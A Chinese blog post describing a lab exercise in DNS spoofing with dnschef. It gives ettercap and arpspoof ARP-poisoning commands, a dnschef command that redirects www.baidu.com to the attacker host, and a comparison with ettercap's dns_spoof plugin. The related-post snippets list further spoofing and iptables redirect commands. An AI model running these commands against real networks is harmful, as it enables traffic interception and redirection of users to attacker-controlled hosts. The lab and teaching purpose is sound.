DNS欺骗【下】----dnschef实现

最新推荐文章于 2024-06-14 16:33:14 发布
原创 最新推荐文章于 2024-06-14 16:33:14 发布 · 2.8k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何使用DNSChef进行DNS劫持实验,包括环境搭建、操作步骤及与Ettercap的对比分析,强调了DNSChef在客户端配置上的额外需求及53端口的开放,对比Ettercap的便捷性。
一、dnschef实验环境

在这里插入图片描述

二、操作步骤

1、在kali上开启arp欺骗(二选一)

ettercap -T -Q -M arp:remote -i eth0 /10.10.10.135// /10.10.10.2//

arpspoof -t 10.10.10.135 -r 10.10.10.2

2、在kali上开启dnschef命令

dnschef --fakeip=10.10.10.136 --fakedomains=www.baidu.com -q --interface=10.10.10.136

此命令相当于在DNS服务器中加入一条以下A记录

www.baidu.com  A  10.10.10.136

此时netstat命令,发现python(dnschef)开启了53端口

root@kali2020:~# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      608/sshd
tcp        0     36 10.10.10.136:22         10.10.10.1:54952        ESTABLISHED 3526/sshd: root@pts
tcp6       0      0 :::22                   :::*                    LISTEN      608/sshd
udp        0      0 10.10.10.136:53         0.0.0.0:*                           5122/python3
udp        0      0 10.10.10.136:68         10.10.10.254:67         ESTABLISHED 552/NetworkManager
udp        0      0 0.0.0.0:69              0.0.0.0:*                           593/inetutils-inetd

3、在win7上DNS设置自动获取,得到10.10.10.2,此时ping www.baidu.com发现并没有解析到10.10.10.136,说明我们在使用dnschef工具时候,必须在客户端DNS配置设置10.10.10.136(kali)为DNS服务器,此时才能顺利得到www.baidu.com–>10.10.10.136的dns劫持需要的解析记录。具体报文(点击下载)
在这里插入图片描述
4、此过程的图示如下
在这里插入图片描述

三、ettercap与dnschef对比

经过对比,很明显ettercap使用dns_spoof插件的情况明显比dnschef好用,dnschef使用时多了一步在客户端的DNS服务器设置步骤,且其开放了53端口,更容易被目标发现。

最新kali之dnschef
vanony的博客
01-20 1144
描述:   DNSChef是针对渗透测试人员和恶意软件分析师的高度可配置的DNS代理。 它能够精细配置哪些DNS回复以修改或简单地代理真实响应。 为了利用该工具,您必须手动配置或破坏DNS服务器条目以指向DNSChef。 该工具需要root特权才能在特权端口上运行。 选项参数: -h,--help 显示帮助信息并退出 --fakedomain thesprawl.org.google.com 以逗号分隔的域名列表,将解析为上述参数中指定的FAKE值。 所有其他域名将解析为其真实值。 --truedo
dnschef实现dns欺骗
04-13
DNS欺骗【下】----dnschef实现 https://blog.csdn.net/redwand/article/details/105495873
dnschef-0.2.1
04-25
dnschef-0.2.1
信安学习---day21-25
ekko_jay的博客
11-23 1504
网络安全
使用kali里的dnschef进行DNS欺骗
qq_33163046的博客
06-06 5507
本文使用kali自带的DNSChef工具做DNS欺骗,工具成功生效了
dnschef进行DNS欺骗
嘟的博客
10-26 2153
title: dnschef DNS欺骗 tags: 中间人攻击 categories: 渗透测试 dnschef --fakeip=192.168.200.2 --fakedomains=www.baidu.com,www.qq.com --interface 192.168.200.243 -q fackip欺骗到指定的ip,facedomains欺骗域名 window修改dns服务器 ...
DNS欺骗-教程详解
wzhua的博客
08-10 5837
DNS欺骗-教程详解,有环境下载链接
dnschef --fakeip 192.168.1.100 --fakedomains example.com --file /path/to/malicious/dns/response
06-08
这是一个命令行工具,用于欺骗 DNS 解析请求。具体来说,它会将指定的域名解析请求重定向到指定的 IP 地址,并返回指定的恶意 DNS 响应。其中,--fakeip 参数指定了要欺骗的 IP 地址,--fakedomains 参数指定了要...
网络安全 - DNS劫持原理 + 实验
最新发布
z339521的博客
06-14 6457
DNSDNS(Domain Name System)即域名系统。我们常说的 DNS 是域名解析协议。DNS 协议提供域名到 IP 地址之间的解析服务。计算机既可以被赋予 IP 地址,也可以被赋予主机名和域名。用户通常使用主机名或域名来访问对方的计算机,而不是直接通过 IP 地址访问。因为与 IP 地址的一组纯数字相比,用字母配合数字的表示形式来指定计算机名更符合人类的记忆习惯。但要让计算机去理解名称,相对而言就变得困难了。因为计算机更擅长处理一长串数字。
深入解析mitm6-master工具的使用与原理
在IPv6环境下,这种攻击方式可以通过多种途径实现,例如通过路由器通告攻击(Router Advertisement, RA)欺骗来获得IPv6地址的优先权,或者通过DNS欺骗等方法来劫持流量。 MitM6工具的主要作用是帮助安全研究人员或...
DNSChef的使用
xiaoxuetu_的博客
07-25 8580
DNSChef是一种在Python中开发的跨平台应用程序。 一、设置DNS代理 1.首先将计算机设置为使用DNS名称服务器工具。 Linux: vim /etc/resolv.conf nameserver 127.0.0.1(如果在本地运行) Windows: 控制面板\所有控制面板项\网络和共享中心 属性--TCP/IPv4 二、运行DNSChef 查询一个域的
dnschef-0.2.1.rar
09-30
dnschef-0.2.1.rar
DNS欺骗攻击2(结合dnschef
robacco的博客
09-23 920
实验步骤 1、开启Linux的ip包转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 2、使用iptables建立一个规则,该规则的功能是把所有截获到的DNS请求报文转发到本机的UDP 53 号端口 iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --...
【KALI】DNS解析工具——Dnschef参数(中英对照)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 1859
dnschef usage: dnschef [options]: _ _ __ | | version 0.4 | | / _| __| |_ __ ___ ___| |__ ___| |_ / _` | '_ \/ __|/ __| '_ \ / _ \ _| | (_| | | | \__ \ (__| | | | __/ | \
DNS欺骗实战
爱吃仡坨的Blog
08-04 896
DNS欺骗
DNSChef 为渗透测试人员和恶意软件分析师提供一个高度可配置的DNS代理
ResumeProject的博客
08-31 417
DNSChef旨在为渗透测试人员和恶意软件分析师提供一个高度可配置的DNS代理。
DNS欺骗攻击与Python实现
Javachichi的博客
11-18 919
DNS欺骗攻击的原理就是攻击者伪装成DNS服务器,向受害者发送虚假的DNS响应,告诉受害者请求的域名对应的IP地址是攻击者自己控制的恶意网站的IP地址。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DNS代理—DNSChef
weixin_30853329的博客
04-23 241
DNSChef是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析。DNS代理(又名“假DNS”),可用于分析用户间传输的网络流量。例如,我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机,进而对流量进行分析。在最新的版本0.2中,引入了对IPv6的支持、大量新的DNS记录类型,自定义端口和其他常用的功能。下载地址:http://thesprawl.org/pro...
渗透测试专用DNS代理 - DNSChef
weixin_30849591的博客
01-29 466
DNSChef是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析。DNS代理(又名“假DNS”),可用于分析用户间传输的网络流量。例如,我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机,进而对流量进行分析。 在最新的版本0.2中,引入了对IPv6的支持、大量新的DNS记录类型,自定义端口和其他常用的功能。 使用方法: 以root权限执行以下命令 # ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值